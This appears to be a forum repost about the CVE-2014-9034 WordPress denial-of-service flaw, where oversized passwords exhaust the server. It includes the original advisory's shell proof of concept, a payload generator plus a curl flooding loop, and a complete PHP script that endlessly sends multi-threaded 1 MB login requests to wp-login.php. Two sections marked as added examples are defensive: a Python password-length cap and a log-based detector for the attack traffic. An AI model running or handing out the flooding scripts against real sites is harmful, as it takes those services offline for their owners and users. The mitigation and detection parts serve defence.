Aerosol

Wordpress <= 4.0 (< 4.0.1) - Denial of Service Exploit


Wordpress < 4.0.1 - Denial of Service

====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).
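Added example, not part of the advisory or of this forum post: a Python sketch of the server-side guard that closes this class of bug, which is to bound the length of the submitted password before it reaches an iterated hash, where verification cost grows with every extra byte. The iterated-MD5 routine below is a simplified stand-in for phpass-style "portable" hashing (no base64 encoding of the result); the 2^13 round count, the 4096-byte cap, the salt and the demo credential are all assumptions chosen for this example.

```python
import hashlib
import hmac

PHPASS_ROUNDS = 1 << 13        # 2^13 iterations; assumed round count for this demo
MAX_PASSWORD_BYTES = 4096      # cap enforced before any hashing; value chosen for this example


def portable_hash(password: bytes, salt: bytes, rounds: int = PHPASS_ROUNDS):
    """phpass-style iterated MD5 (simplified stand-in, not the real library).

    Returns (digest, bytes_hashed) so the cost of a verification is visible:
    every round re-hashes the full password, so cost is rounds * len(password).
    """
    digest = hashlib.md5(salt + password).digest()
    hashed = len(salt) + len(password)
    for _ in range(rounds):
        digest = hashlib.md5(digest + password).digest()
        hashed += len(digest) + len(password)
    return digest, hashed


def hashing_cost(password_len: int, salt_len: int = 8, rounds: int = PHPASS_ROUNDS) -> int:
    """Bytes fed through MD5 to check one password of the given length (no hashing performed)."""
    return (salt_len + password_len) + rounds * (16 + password_len)


def verify_login(password: bytes, salt: bytes, stored: bytes) -> dict:
    """Login check that refuses oversized passwords before touching the hash function.

    The length test is the mitigation: a 1 MB password is rejected at zero hashing cost,
    while ordinary passwords are verified as before.
    """
    if len(password) > MAX_PASSWORD_BYTES:
        return {"ok": False, "reason": "password_too_long", "bytes_hashed": 0}
    digest, hashed = portable_hash(password, salt)
    ok = hmac.compare_digest(digest, stored)   # constant-time comparison of the digests
    return {"ok": ok, "reason": None if ok else "incorrect_password", "bytes_hashed": hashed}


# Constructed credential for the demo (assumption, not a real account)
DEMO_SALT = b"saltsalt"
DEMO_PASSWORD = b"correct horse"
DEMO_STORED, _ = portable_hash(DEMO_PASSWORD, DEMO_SALT)


if __name__ == "__main__":
    print("normal login  :", verify_login(DEMO_PASSWORD, DEMO_SALT, DEMO_STORED))
    print("1 MB password :", verify_login(b"A" * 1_000_000, DEMO_SALT, DEMO_STORED))
    print("cost ratio 1 MB vs 8 bytes:", hashing_cost(1_000_000) // hashing_cost(8))
```

The point of `bytes_hashed` is to make the amplification concrete: with the assumed round count, verifying an 8-byte password feeds about 200 KB through MD5, a 1 MB password about 8 GB, and the cap turns the second case into an immediate rejection. Schemes such as bcrypt truncate the input to a fixed length and so do not scale this way, but any scheme that re-hashes the whole password per round needs the length check in front of it.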

====================================================================
Time Line:
====================================================================

November 20, 2014 - A Wordpress security update and the security
advisory is published.

====================================================================
Proof of Concept:
====================================================================
Generate a payload and try with a valid user:

echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

Perform a DoS with a valid user:

for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done

====================================================================
Authors:
====================================================================

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info

====================================================================
References:
====================================================================

* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
* http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
* http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050

WordPress <=4.0 Denial of Service Exploit

<?php

echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];

do {

    $multi = curl_multi_init();
    $channels = array();

    // One curl handle per "thread", all attached to the same multi handle
    for ($x = 0; $x < $argv[3]; $x++) {
        $ch = curl_init();

        $postData = array(
            'log'         => $argv[2],
            'pwd'         => str_repeat("A", 1000000),
            'redirect_to' => $argv[1] . "/wp-admin/",
            'reauth'      => 1,
            'testcookie'  => '1',
            'wp-submit'   => "Log%20In");

        $cookieFiles = "cookie.txt";

        curl_setopt_array($ch, array(
            CURLOPT_HEADER         => 1,
            CURLOPT_USERAGENT      => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
            CURLOPT_REFERER        => $argv[1] . "/wp-admin/",
            CURLOPT_COOKIEJAR      => $cookieFiles,
            CURLOPT_COOKIESESSION  => true,
            CURLOPT_URL            => $argv[1] . '/wp-login.php',
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST           => true,
            CURLOPT_POSTFIELDS     => $postData,
            CURLOPT_FOLLOWLOCATION => true));

        curl_multi_add_handle($multi, $ch);

        $channels[$x] = $ch;
    }

    $active = null;

    // Drive the multi handle until every transfer has completed
    do {
        $mrc = curl_multi_exec($multi, $active);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);

    while ($active && $mrc == CURLM_OK) {
        do {
            $mrc = curl_multi_exec($multi, $active);
        } while ($mrc == CURLM_CALL_MULTI_PERFORM);
    }

    foreach ($channels as $channel) {
        curl_multi_remove_handle($multi, $channel);
    }

    curl_multi_close($multi);
    echo ".";
} while (1==1);

?>
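Added detection example, not part of the advisory, the forum post or the PoC above: the traffic pattern both proofs of concept produce (many login POSTs from one client, each carrying a password field of about a megabyte) is easy to spot in web server logs. This Python detector applies two rules over access-log lines, an oversized POST to the login endpoint and a burst of login POSTs from one IP. It assumes a log format of the usual "combined" fields followed by the request size in bytes (nginx `$request_length` or Apache mod_logio `%I`), which is not logged by default; the thresholds, the sample IPs and the log lines themselves are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed log format (constructed for this example): combined log fields plus a
# trailing request-size field. Without that field only the rate rule can fire.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" (?P<reqlen>\d+)$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

LOGIN_PATHS = ("/wp-login.php",)      # endpoint that hashes the submitted password
MAX_REQUEST_BYTES = 16 * 1024         # a login form should never be this large (threshold chosen here)
BURST_COUNT = 20                      # login POSTs from one IP ...
BURST_WINDOW = timedelta(seconds=60)  # ... inside this window


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    rec["reqlen"] = int(rec["reqlen"])
    return rec


def detect(lines):
    """Return (rule, ip, value) alerts for oversized or bursty login POSTs."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    burst_alerted = set()         # alert once per IP for the rate rule
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        if rec["reqlen"] > MAX_REQUEST_BYTES:
            alerts.append(("oversize_login_post", rec["ip"], rec["reqlen"]))
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        while rec["ts"] - window[0] > BURST_WINDOW:   # slide the window forward
            window.popleft()
        if len(window) >= BURST_COUNT and rec["ip"] not in burst_alerted:
            burst_alerted.add(rec["ip"])
            alerts.append(("login_post_burst", rec["ip"], len(window)))
    return alerts


def sample_log():
    """Constructed traffic: one normal visitor, then one client replaying the PoC pattern."""
    base = datetime(2014, 12, 10, 12, 0, 0, tzinfo=timezone.utc)
    fmt = lambda t: t.strftime(TS_FORMAT)
    lines = [
        f'203.0.113.7 - - [{fmt(base)}] "GET /wp-login.php HTTP/1.1" 200 1542 "-" "Mozilla/5.0" 412',
        f'203.0.113.7 - - [{fmt(base + timedelta(seconds=5))}] "POST /wp-login.php HTTP/1.1" '
        f'302 0 "http://example.test/wp-login.php" "Mozilla/5.0" 603',
    ]
    for i in range(25):   # two login POSTs per second, each with a ~1 MB password field
        t = base + timedelta(seconds=i // 2)
        lines.append(
            f'198.51.100.23 - - [{fmt(t)}] "POST /wp-login.php HTTP/1.1" 200 3211 '
            f'"http://example.test/wp-admin/" "Mozilla/5.0" 1000312'
        )
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

On the constructed sample the size rule fires for each of the 25 oversized POSTs and the rate rule once, both for 198.51.100.23, while the ordinary visitor produces nothing. In practice the size rule is the stronger signal, since a legitimate login form is a few hundred bytes, so it is worth enabling request-size logging on the login path if the default format does not carry it; the same ceiling can also be enforced in front of the application (a body-size limit scoped to the login endpoint) rather than only observed after the fact.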
